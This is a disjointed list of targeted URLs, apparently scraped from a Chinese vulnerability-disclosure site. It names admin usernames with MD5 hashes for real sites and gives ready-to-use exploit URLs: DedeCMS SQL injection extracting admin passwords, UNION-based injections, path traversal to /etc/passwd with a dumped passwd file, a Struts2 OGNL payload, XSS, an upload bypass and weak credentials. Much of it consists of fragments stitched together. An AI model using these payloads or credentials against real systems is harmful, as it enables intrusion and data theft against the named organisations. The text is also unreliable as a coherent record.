UserName:adminsswqzxdede51oucom MD5:ad32fb0f66e2f3ad http://www.maomaome.com UserName:admin MD5:be27139e41c93cab http://news.xuejiqiao.com UserName:admin MD5:d94a6ea252fd0165 http://www.hxlaa.com UserName:xiao MD5:6b41eb2011dcf129 http://www.zz1x.com UserName:btao24 MD5:24656dcb484a04b2 http://www.525222.com UserName:lotus MD5:1c9b9131355627bc http://www.shouwutang.com UserName:admin MD5:4394dda586a2b734 http://202.196.33.231 UserName:yxz MD5:293f3c88011d98e6 http://www.qbzjw.org UserName:admin MD5:e2695f8bed7ea430 http://www.mtksj.com UserName:youzhibin MD5:9a3eecebbaee7162 http://www.ajzw.gov.cn UserName:admin MD5:0e1b2a7b1edad7bc http://www.hrbcct.com UserName:Fabu MD5:8a6107e9574674cc08dbe6b43b43 http://www.52bus.com UserName:admin MD5:9716bbd9f69b4582 http://www.robotain.com UserName:robotain MD5:dab90ff1f6b416f1 http://www.justds.com UserName:admin MD5:87561d5afa5ba709 http://www.cnyako.com UserName:didi8765 MD5:a7d6fe7baaff92f9 http://www.chromegame.org UserName:admin_Game@123 MD5:34471f652c9ef6bd http://www.tgindt.com UserName:admin MD5:fab11a8a46bc41a5 http://www.gzhifi.com UserName:admin MD5:c262973e4f9d8fbe http://www.chinajianyang.com UserName:admin MD5:be692a77e34d959c http://210.28.92.133/njsj/bbs/admin/index.jsp也没啥好说的,后台注入漏洞,直接'or http://bot.aili.com/?a=login&c=bot&m=login http://baike.qmango.com:8080/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post http://cwc.cumt.edu.cn/wsyy http://jcc.chd.edu.cn/wsyy/ http://baoxiao.icw.buaa.edu.cn/ http://202.201.0.241/yybz/default.aspx http://oa.cqmcd.com:8089/admin/MainPage.aspx地址。直接'or http://www.nan-gang.gov.cn/Manage/Log/List.aspx直接'or http://app.yesky.com/利用的网站程序DEDECMS存在一个已经被公开的SQL注入漏洞,能获得管理员和普通用户的用户名和密码,可能造成用户数据泄露,并面临被脱裤的危险。 http://www.bestay.com.cn/Web/Chain/HotelComment.aspx?unitId=8097&cityId= http://club.suning.com/thread-2205295-7-1.html http://222.39.14.168/security/jtmain.aspx http://222.39.14.168/security/mainpage.aspx http://tregister.ufida.com.cn/Card.aspx http://ccidstudy.ccidnet.com/lib/cms/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://homemsg.focus.cn/msgview/804/287389011.html http://home.focus.cn/zxrj/diary.php?this_login_id=65482616 http://home.focus.cn/zxrj/diary_content.php?note_id=325178 http://home.focus.cn/zxrj/account.php?this_login_id=65482616 http://home.focus.cn/chanpinku/search.php?q=%3Csvg+onload%3Dalert%28%2Fsohu%2F%29%3E http://play.jb51.net http://www.maxen.com.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://sc.wo.com.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://61.154.9.17/lxs_fs_index.asp直接 http://xmmyzm.300188.cn/admin/login.aspx http://eduadmin.open.com.cn/LearningCenter/noteService/OMSMessageAnalysisList.aspx?_SendType=1&_msgID=4376090&_Status=2 www.jtbdqn.com http://sn.189.cn/service/pay/fluxcard.action?tab=buyFluxCard http://jx.china.com.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://www.eboss.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://v5mall.v5shop.com.cn/做测试,官方测试账号admin密码123456(不是管理员权限,老大重新注册个也可以) http://v5mall.v5shop.com.cn/Product.aspx?id=758 http://v5mall.v5shop.com.cn/Member/UpdateOrderPrice.ashx?oid=140110185071685339&pid=758&op=360.00 https://www.cmi.chinamobile.com//CPortal/images/go.Htm?i=/z21x/25P http://ecmall/admin/index.php?app=widget&act=edit&name=notice&file=script http://www.2cto.com/Article/201306/217250.html http://ecmall/external/widgets/notice/main.widget.php http://tantan.kankan.com/wp-admin http://v5mall.v5shop.com.cn http://v5mall.v5shop.com.cn/member/V5Mall_UserAddress_Operate.aspx?id=121 http://wyxy4.yzu.edu.cn/jpkc/report.asp?de1a02c863d2db58366dd53255c1dd8f http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick存在post型sql注入漏洞 AmwayServices.asmx/PvAddClick www.amway.com.cn http://www.amway.com.cn http://url.blog.51cto.com/user_index.php?action=delarticle display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 http://www.ah-seo.net http://218.16.245.35:8088/tj/syspurview/login.do?action=logininit http://www.csh.edu.cn/MOETC/login/loginAction!getAllSchool.action http://kids.anta.com/ http://kids.anta.com/callback.php http://kids.anta.com/phpmyadmin/index.php https://zjjcy.gov.cn wooyunyana:123456 wooyunyana:194383 http://www.bestay.com.cn/Web/Chain/HotelComment.aspx?unitId=8097&cityId= http://www.magnotel.com/Inn/chains.aspx?&UnitID=088 http://m.vip.com/index.php?m=special&v=touch&p=/../../../../../etc/passwd http://www.cailele.com/uc/safeCenter.php?action=updateMobileSave display:none!important;display:block;width=0;height=0 http://cn.bing.com/search?q=site%3Asto.cn+login&go=&qs=n&form=QBLH&pq=site%3Asto.cn+login&sc=0-0&sp=-1&sk= http://116.228.73.38:8008 http://golf.cctv.com/ http://golf.cctv.com/e/extend/dc_list.php?key= http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid= http://golf.cctv.com/e/extend/court/court_detail.php?courtid=131&hole=1#hole_data http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid= http://111.1.33.30:8080/index.aspx http://www.wfdedu.gov.cn/index.html events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1 http://mobsupport.zte.com.cn/ http://mobsupport.zte.com.cn/admin/ http://tianqi.114la.com/?539d4da574b83345996ab341a109321f=845%20AND%203*2*1=6%20AND%2062=62 http://ce.atlenovo.com/ams/view.php?id=15 http://youxue.xdf.cn http://m.youxue.xdf.cn/line/index?DictionaryId=2 http://m.youxue.xdf.cn/line/index?CountryId=39c998fb-3c60-8e8c-4a92-416f159deb58 http://m.youxue.xdf.cn/diary/index?lineid=ae3050bf-4a0d-a3a4-4dfe-ade72ac11b26 http://m.youxue.xdf.cn/pic/index?lineid=ae3050bf-4a0d-a3a4-4dfe-ade72ac11b26 http://m.cztv.com//mobiletv/login.php http://www.yhfg.gov.cn/ http://www.yhjt.gov.cn/ http://www.hzyhldbz.gov.cn/ http://www.yhjsj.gov.cn/ http://www.yhdj.gov.cn/ http://yggc.yhlz.gov.cn/ http://www.yhls.gov.cn/ http://www.zjfuture.gov.cn/ http://www.yhtyzx.gov.cn/ http://wsj.yuhang.gov.cn/ http://www.yhjtjt.com/ http://www.yhland.gov.cn/ http://www.yhsjj.gov.cn/ http://www.zjgia.org.cn/ http://www.yhgcc.com http://www.hitcc.cn/ http://www.yhlpsy.com/ http://www.yhsqxy.com/ http://www.dabongtech.com/ http://www.yhgh.org/ http://www.hztxsx.com/ http://www.yhlz.gov.cn/ http://www.yhfg.gov.cn/ http://www.yhfg.gov.cn/messages_detail.aspx http://www.yhfg.gov.cn/list.aspx http://www.yhfg.gov.cn/messages.aspx?classid=5 http://www.yhjt.gov.cn/ http://www.yhjt.gov.cn/sltszt/pic.aspx?classid=107 http://www.yhjt.gov.cn/sltszt/news.aspx?classid=105 http://www.hzyhldbz.gov.cn/ http://www.hzyhldbz.gov.cn/sun_more.aspx?classid=434&item=0 http://www.hzyhldbz.gov.cn/search.aspx http://www.yhjsj.gov.cn/ http://www.yhjsj.gov.cn/newsshow-pic.asp?id=123 http://www.yhjsj.gov.cn/info.asp?id=4 http://www.yhjsj.gov.cn/city.asp?id=234 http://www.yhjsj.gov.cn/newsshow.asp?ID=6601 http://www.yhjsj.gov.cn/gsl.asp?id=339&lid=5 www.piao.com.cn http://www.piao.com.cn/public/tongji/search/piao.asp?itype=4 site:saicgroup.com,可以发现大量二级域名为博彩站点。 http://www.xygy.gov.cn/admin/Signin.aspx?returnURL=%2fadmin.aspx http://dwrh.net/ http://www.cpweb.gov.cn/ http://www.baidu.com/ulink?url=http://www.wooyun.org http://www.btdhlz.gov.cn/admin/login.aspx http://www.cpecartoon.com/cn/index.html http://www.sd.chinaunicom.com/index.html http://www.letushuo.com/index.php?app=tuan&cateid=3’ http://dazhe.byecity.com/ajax/ajaxurl.aspx http://dazhe.byecity.com/ajax/ajaxurl.aspx?action=city&province=12 http://zxxxj.tj.edu.cn/uids/login!login.action http://dzda.e21.edu.cn/ http://dzda.e21.edu.cn/dzda/login.php http://dzda.e21.edu.cn/dzda/e21web/xjgl_dzzw/xsxj.php这里可以绕过 http://www.shsic.org.cn/ http://www.dghui.com/register.action http://www.dghui.com/register.action http://scc2014.hnu.edu.cn http://ec.xcloudz.com/ecommerce/selfservice.action https://uc.xcloudz.com/ucenter/subscriber.action http://kefu.linekong.com/eService/system/inputLogin.do http://passport.linekong.com/invoker/JMXInvokerServlet http://kefu.linekong.com/eService/js/ http://ss.linekong.com/activity/shounvlang/girlinfo.php?girlid=13 http://yb.linekong.com/upload.php,抓包修改1.jpg为1.php,经测试可以上传成功,只是一下没找到上传路径 http://www.zj56.com.cn:8080/zj56/findkuaidi.action http://www.chinaiiss.com/ http://www.magnotel.com/ http://www.magnotel.com/Inn/chains.aspx?&UnitID=9013&CityID= http://220.196.57.147:8080/ http://220.196.57.147:8080/ http://xj.vae.ha.cn/1/index.html http://xj.vae.ha.cn/1/jyb/login.jsp http://xj.vae.ha.cn/1/sjleader/login.jsp http://xj.vae.ha.cn/1/bl/login.jsp http://xj.vae.ha.cn/1/sj/login.jsp http://xj.vae.ha.cn/1/sx/login.jsp http://xj.vae.ha.cn/1/xx/login.jsp http://xj.vae.ha.cn/1/xlrz/login.jsp http://passport.aedu.cn/api/getlogin?callback=jQuery191045942397392354906_1393519178458&uid=admin&pwd=admin&_=1393519178461 http://passport.aedu.cn/api/getlogin?uid=admin&pwd=admin http://news.gbicom.cn/gbicom/login.php http://www.ciprun.com/admin/privilege.php http://www.ciprun.com/help1.php?id=62 Url:http://www.bestay.com.cn/Web/Reservation/Destine2.aspx?uid=8106&rid=0002&RmNum=1&bt=2014-03-02&et=2014-03-03 Url:http://www.bestay.com.cn/Web/Reservation/Select.aspx?city=%E5%A4%A9%E6%B4%A5%E5%B8%82&citycode=1200&key=%E5%9F%8E%E5%B8%82/%E5%BA%97%E5%90%8D/%E5%9C%B0%E6%A0%87/%E8%A1%97%E9%81%93/%E6%99%AF%E7%82%B9&room=1&intime=2014-03-02&outtime=2014-03-03&storename=%E7%99%BE%E6%97%B6%E5%BF%AB%E6%8D%B7%E5%A4%A9%E6%B4%A5%E7%8E%8B%E9%A1%B6%E5%A0%A4%E5%9C%B0%E9%93%81%E7%AB%99%E5%BA%97&htlcd=8106 http://ss.linekong.com/game_datum/freshman/novice.php?sort_id=154 http://movie.douban.com/subject/1793929/questions/1680/?from=question_hot_all Url:http://218.75.75.92/user_space.php?username=admin http://rx.8864.com/imagelist.php?sort_id=87 http://www.gzgwbn.net.cn/yyt/index.php?m=content&c=index&a=lists&catid=15 http://www.sjz10000.com/ http://www.weimob.com/crossdomain.xml http://yy.teatree.cn/vip/ http://bbs.peaksport.com/XP001-Forum-Team/Initial.html http://www.ceeg.cn:80/inc/newsfeeds.php?lang=1 http://luntan.yhd.com/forum.php?mod=viewthread&tid=653&extra=page%3D1 http://www.cdgdc.edu.cn/tdxlsqxt/stuPassword.html http://bobo.cztv.com/admin.php http://bobo.cztv.com/shell.php http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml inurl:datacenter http://www.zgc3x.com/jw/student/getfile.do?id= http://1.202.236.46/jw/student/getfile.do?id= http://www.ajzw.gov.cn/ http://madmin.7k7k.com/sys/login.php?cmd=form http://122.11.52.245:8080/script http://www.nju.gov.cn:8080 http://server.zdnet.com.cn/files/search.php?subclass=506%20and%201=2%20union%20select%201,user%28%29,database%28%29,4,5--&t=9 http://ec.zdnet.com.cn/files/searchs.php?date=201301&subclass=609%20and%201=2%20union%20select%201,user%28%29,3,database%28%29,5-- http://e.xbwl.cn/queryWind!queryPrice.action http://www.csxedu.net/system‎作为测试 url:http://www.csxedu.net/register.htm http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116571048791207.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116582789951391.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116582789943144.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116582789923851.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116571048779464.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116571048796252.txt http://webmail.jx.chinamobile.com/portal/ http://www.hzfc.gov.cn/UserFiles/File/news/yiban.txt http://www.hzfc.gov.cn/UserFiles/File/news/yiban.txt http://www.hzfc.gov.cn/UserFiles/File/news/youxian.txt http://rsj.sdqixia.gov.cn/upload_files/files/20130606_020028.txt http://www.ycfgj.gov.cn/news/soft/yh.txt http://10000.gd.cn/wangyuntest/ http://10000.gd.cn/wangyuntest.zip http://itoms.open.com.cn/Admin/index.aspx http://team.360shop.com.cn/register.php http://team.360shop.com.cn/?mod=acp&do=acp_bug_info&id=388 http://www.szzfgjj.com/szgjj/Guestbook.jspx http://szzfgjj.com/szgjj/SearchMsg.jspx?ctgId= http://xss.webvul.com/5NVhnS http://www.gzal.gov.cn/index.htm http://www.tghl.gov.cn/baijia/ http://www.hebfxgt.gov.cn/Uploadfile/wps/2009-5/index.htm http://www.fcwgx.gov.cn/uploadfile/CSS/windows/fun14-528.htm http://www.hanyang.gov.cn/html/qtjj/9847/index.html www.lnlaw.gov.cn:5515/ www.lnlaw.gov.cn:100/ www.lnlaw.gov.cn:7145/ www.lnlaw.gov.cn:3047/ www.lnlaw.gov.cn:3494/ www.lnlaw.gov.cn:4479/ http://www.sczyjj.gov.cn/quanxunwang/ http://www.cmkj.gov.cn/bcwkh/ http://www.yhfgj.gov.cn/js/ http://www.jnipo.gov.cn/zhuanti/1100/ http://www.aqdz.gov.cn/include/images/568/ http://ets-ccaa.open.com.cn/Va_username.aspx?username=iris_wan2011 http://www.zte-d.com/html.rar http://mail.zdnet.com.cn/html/login.php?Lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin mysql:x:500:500::/export/home/db/mysql:/bin/bash alias:x:501:501::/var/qmail/alias:/sbin/nologin qmaild:x:502:501::/var/qmail:/sbin/nologin qmaill:x:503:501::/var/qmail:/sbin/nologin qmailp:x:504:501::/var/qmail:/sbin/nologin qmailq:x:505:502::/var/qmail:/sbin/nologin qmailr:x:506:502::/var/qmail:/sbin/nologin qmails:x:507:502::/var/qmail:/sbin/nologin vpopmail:x:89:89::/home/vpopmail:/bin/bash clamav:x:508:503::/home/clamav:/bin/false qscand:x:509:504::/home/qscand:/bin/false nasaexec:x:672:672:NASA nasaexec:/bin/bash lyb:x:0:0::/home/lyb:/bin/bash yalino:x:0:0::/home/yalino:/bin/bash http://153.cn/feedback.do http://app.open.com.cn/applyusing.aspx www.mayizhaopin.com http://www.gansu.gov.cn/jiep/objectbox/selectx_userlist.jsp http://101.66.251.195/login.php http://wkf.shu.edu.cn/login.aspx http://www.scjm.gov.cn:8080/gov/page/NewsQuery_n.jsp?ID=275 http://www.scjm.gov.cn:8080/gov/page/download.jsp?file=../../gov/page/OB_NEW_SHOW.jsp http://www.scjm.gov.cn:8080/gov/page/download.jsp?file=../../gov/page/hyxh.jsp http://dlut.open.com.cn/console.dep http://wo.zdnet.com.cn/comment/fy1.php?mit&replay&pkid=[注入点]&id=comma&type=A&page=1 http://wo.zdnet.com.cn/comment/fy1.php?m http://wo.zdnet.com.cn/comment/fy1.php?mit&replay&pkid=4&id=comma&type=A&page=1 http://my.hxsd.com/user/pm/messages.html http://bbs.webscan.360.cn/ http://eduadmin.open.com.cn/ http://eduadmin.open.com.cn/learningCenter/tgregister/checkordercode.aspx http://bbs.proxycn.cn/hack.php?H_name=xqqiandao&qdorder=20 http://edun.hzcnc.com/kr_detail.asp?id=3488 http://www.78app.com/1.php www.dingjianshishang.com/login.php www.twsp8.com/?do=count&mod=ucp http://www.twsp8.com/?class_id=5&do=index&mod=../../../../../../../../../../etc/passwd%00.jpg&per_page=80&sway=list http://www.twsp8.com/?do=../../../../../../../../../../etc/passwd%00.jpg&is_type=is_new&mod=goods http://www.zjredcross.org.cn/web/comm/videoDetail.jsp?MenuIds=47 inurl:student_info1.aspx http://kefu.linekong.com/eService/system/inputLogin.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://touzi.gov.cn/ http://121.199.10.229/Yooli_1.0.8.apk http://gjzx.nwu.edu.cn/ http://218.94.30.9/ http://218.94.30.9:8080/JSJG/Silic.jsp http://opac.jxlib.gov.cn/ntbookretrtopshowrig http://bbs.hxsd.com/newthread.php?do=postthread&f=419 http://w.cn/help.php?m=index&a=operate&itemid=36922427&type=3,源码钟发现通过手机+验证码删除帖子的API没做验手机校验码,可直接删除帖子。 http://218.108.73.82 http://218.108.73.82/codebase/ m.oppo.com/login.html http://yt.linekong.com/wj_image.php?image_id=1701 http://yt.linekong.com/morei.php?sort_id=23 http://foreign.jlu.edu.cn/ http://life.jlu.edu.cn http://sf.jlu.edu.cn http://art.jlu.edu.cn/dwgz_c.php?file_id=1039 http://cbae.jlu.edu.cn/articles.php?id=1582 http://xy.linekong.com/wallpaper.php?sort_id=43&page=1 http://xy.linekong.com/picture.php?sort_id=44&page=1 http://xy.linekong.com/special/oneyear/index.php?article_id=1414 http://xy.linekong.com/special/war_of_camps/?article_id=1149 http://www.jhxcb.gov.cn/ http://dag.swu.edu.cn/index/ www.dgdianxin.com http://www.bozhou.gov.cn:81/bzssq/mainFrame.do http://www.hzim.org/sign/score.php?type=csh&idnum=1 http://service.chinamobiledevice.com.cn/System/Login.aspx http://ltdx.sp.169ol.com/list_elite.php?elite=1 http://ltdx.sp.169ol.com/list_type.php?type_ID=1 http://tv.jlu.edu.cn:80/v2/index.php?o=showc;id=1,参数id没有过滤。 http://www.pingpang.10010.com/马赛克/login.php。 http://uu.xunlei.com/scriptresource.axd?d=1AAoAAAAAAAAAAAAAAAAACFI7q3lw-OmMyL7_-33DMUAAAAAAAAAAAAAAAAAAAAA0 http://kjcg.jlu.edu.cn/pages/introduction/read.aspx?flag=8,参数flag没有过滤 http://www.tj10010.com:8080/wopai/confirmnumber?number= http://www.changtu.gov.cn/index.htm http://content.pp.cc/ctpanel/login.php http://xxgk.jiangyan.gov.cn/xxgk/workflow/objectbox/selectx_userlist.jsp http://xxgk.nbhtz.gov.cn/gxxxgk/workflow/objectbox/selectx_userlist.jsp http://xxgk.yichang.gov.cn/gov/workflow/objectbox/selectx_userlist.jsp http://xxgk.ouhai.gov.cn/xxgk/workflow/objectbox/selectx_userlist.jsp http://xxgk.ycxl.gov.cn/gov/workflow/objectbox/selectx_userlist.jsp http://tieba.baidu.com/home/main/?un=%c0%ee%d1%e5%ba%ea http://c.tieba.baidu.com/c/u/user/profile http://c.tieba.baidu.com/c/u/user/profile?pn=1&rn=200&uid=79&sign=3E45F58F284D4A01AC4319F5AECC6FC2 http://t.hexun.com/23795498/default.html http://res.ks.91.com/Upload/theme/image.aspx http://resmgt.sj.91.com/Upload/Theme/2013/5/28/a.asp/1.zip http://yanzhao.bsu.edu.cn/news/Shownews.asp?id=31 http://yanzhao.bsu.edu.cn/news/Shownews.asp http://xq.bsu.edu.cn/my http://weipai.baidu.com/photo/getalbumpic?city_name=%E5%85%B0%E5%B7%9E%E5%B8%82,%E5%A4%A9%E6%B0%B4%E5%B8%82,%E6%B1%89%E4%B8%AD%E5%B8%82,%E7%BB%B5%E9%98%B3%E5%B8%82&end_date=2014-02-17&start_date=2014-02-02&un=732340Mark http://tv.tom.com/App_User_UserUpload.php?type=1&user_id=1 http://tv.tom.com/App_User_UserUpload.php?type=1&user_id=1 http://211.138.112.80:8080/dbs/ www.189.cn,选择山西省,然后点登陆,在登陆界面点击找回密码选项。 http://www.189.cn/dqmh/managePwdAction.do?method=resetPassWord http://www.linekong.com/pay/sk_core.php?city=%E5%AE%89%E5%BE%BD http://www.linekong.com/pay/xk.php?city= http://ss.linekong.com/xml/index1.php?sort_id=43%22/ http://yb.linekong.com/morei.php?sort_id=223 http://yt.linekong.com/voting.php?types=radio&vote_id=33 http://yt.linekong.com/wj_image.php?image_id=11378 http://xyhj.linekong.com/painting.php?sort_id=44&page=1 http://xyhj.linekong.com/wallpaper.php?sort_id=43&page=1 inurl:php?+You http://bjmh.mau.edu.cn/news.php?cid=1 http://www.yqchinwin.com/index.html http://shopware.hitao.com/dorado/console.d http://kx.linekong.com/include_jsjs.php?article_id=1 http://bbs.lm.8864.com/forum.php http://ms.linekong.com/activity/clan/_do_getPlayerList.ajax.php http://u.mbaobao.com/ http://u.mbaobao.com/index.php?option=com_website&task=edit&cid[]=13497 http://u.mbaobao.com/index.php?option=com_website&task=edit&cid[]=13487 http://u.mbaobao.com/index.php?option=com_website&task=edit&cid[]=13485 http://www.huoying.com/activity/voting/personInfor.php?name=zhang0671 http://kefu.linekong.com/eService/system/inputLogin.do http://mail.7k7k.com/login.php Cookie:LoginDomain= http://www.qzdatasoft.com:81/jiaowu2008/JwGl/DelAccessID.asp?Datetime=2014-02-28%2015:57:36&AccessID=20140228155736.4847223 http://gzwtqx.com/ http://www.ynxdfpr.com/ http://hnwtqx.com/ http://gzwtqx.com/ http://sxwtqx.com/ http://linxi.gov.cn/test.php?id=547 http://www.75510010.com/adv/sz10010.aspx?sid=201402131635442602 http://www.xdfce.cn/ http://www.xdfce.cn/xdfadmin/login.php?gotopage=%2Fxdfadmin%2Findex.php http://www.ccxdf.cn/ http://www.pzhdqedu.gov.cn/php/wzgl/wzgl_show.php?id=588 http://www.10010tianjin.com:8080/wopai/confirmnumber?number= http://xt.10010jia.com/search.aspx?brand=1398 http://xt.10010jia.com/Search.aspx?LoSearch=&Locals=ls&type=&searchWord= http://xt.10010jia.com/search.aspx?promotion=&type=&searchWord=&brand=&listType=&orderField=SalesNumber&LoSearch= http://xt.10010jia.com/Search.aspx?searchWord=&brand=1092 http://xt.10010jia.com/search.aspx?chufang=1&cfid=&type=-99&searchWord=&brand=&listType=&orderField=SalesNumber&LoSearch= http://xt.10010jia.com/Search.aspx?LoSearch=&Locals=ls&chufang=1&cfid=1&type=3778&searchWord= http://xt.10010jia.com/ServiceStation/NewServicePro.aspx?sCustCode=1569401 http://mtdz.org/ http://wxdianxin.com/ http://218.7.20.53:8080/ http://yjsb.tjpu.edu.cn/degree.php?sortid=14 http://yjsb.tjpu.edu.cn/ http://myjob.dlmu.edu.cn/rili/admin/cal_user.php这个地方存在弱口令(admin http://panda.sj.91.com/NewPanda/Novel/SubjectList.aspx?id=300 http://skzzf.com/ http://vote.hsw.cn/vote_show.php?vote_id=100000001111 http://jy.scu.edu.cn/jiuye/shownews.php?type_id=5&newsid=15135 http://tms.byd.com.cn/system/login!loginSSO.action http://xlfc.changyou.com/template/shop/images/more_news_title_bar_bgs.jsp http://www.lemo.me/backstage/s_login.aspx http://www.qhsw.gov.cn/viewnews.php?id=34 http://usercms.hxsd.com/admincp/archive.php?do=add&channelid=47 http://www.4006055885.com/ http://sh.qihoo.com/zt/lianghui2014/index.html http://vote2.gmw.cn/poll.php?action=choose&inajax=1&handlekey=pollresult&id=59&formhash=5148ab9c&iframe=1&bgcolor=FFF&choose_value=290 http://mis.jj-inn.com/jmx-console/HtmlAdaptor?action=displayMBeans http://mis.jj-inn.com/web-console/ http://mis.jj-inn.com/index.jsp http://union.xiu.com/monitor/jvm/login.jsp http://www.wasu.org/ http://211.90.245.135/IOS/login.do 